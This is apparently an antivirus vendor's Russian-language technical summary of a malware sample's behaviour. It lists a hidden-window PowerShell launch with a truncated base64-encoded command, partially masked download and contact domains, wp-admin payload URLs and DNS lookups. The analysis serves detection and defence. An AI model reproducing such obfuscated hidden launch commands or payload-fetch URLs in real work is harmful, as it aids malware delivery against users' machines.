Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGYAbwBjAG4AZgB1AHoAdABxAD0AJwBFAGQAbgBtAHcAbgBpAHAAaQBrACcAOwAkAE0AcAB0AGYAZgBhAGYAcwB1AHgAeQAgAD0AIAAnADMANgAzACcAOwAkAFEAcgByAHQAbQBrAGsAeABrAD0AJwBYAGcAcABlAGkAbwBzAHoAZgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1556
- %TEMP%\1299940.cvr
- 'vg##h.com':80
- 'cc##bbt.com':80
- 'cc##bbt.com':443
- http://www.vg##h.com/wp-admin/Ch9wxSq/
- http://www.vg##h.com/wp-admin/Ch9wxSq/1
- http://www.cc##bbt.com/file/Ayvb228/
- 'cc##bbt.com':443
- DNS ASK vg##h.com
- DNS ASK kh###buiads.com
- DNS ASK cc##bbt.com
- DNS ASK pa#####.##nstructorajksalcedo.com
- DNS ASK ma####lrefat.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABHAGYAbwBjAG4AZgB1AHoAdABxAD0AJwBFAGQAbgBtAHcAbgBpAHAAaQBrACcAOwAkAE0AcAB0AGYAZgBhAGYAcwB1AHgAeQAgAD0AIAAnADMANgAzACcAOwAkAFEAcgByAHQAbQBrAGsAeABrAD0AJwBYAGcAcABlAGkAbwBzAHoAZgB...' (со скрытым окном)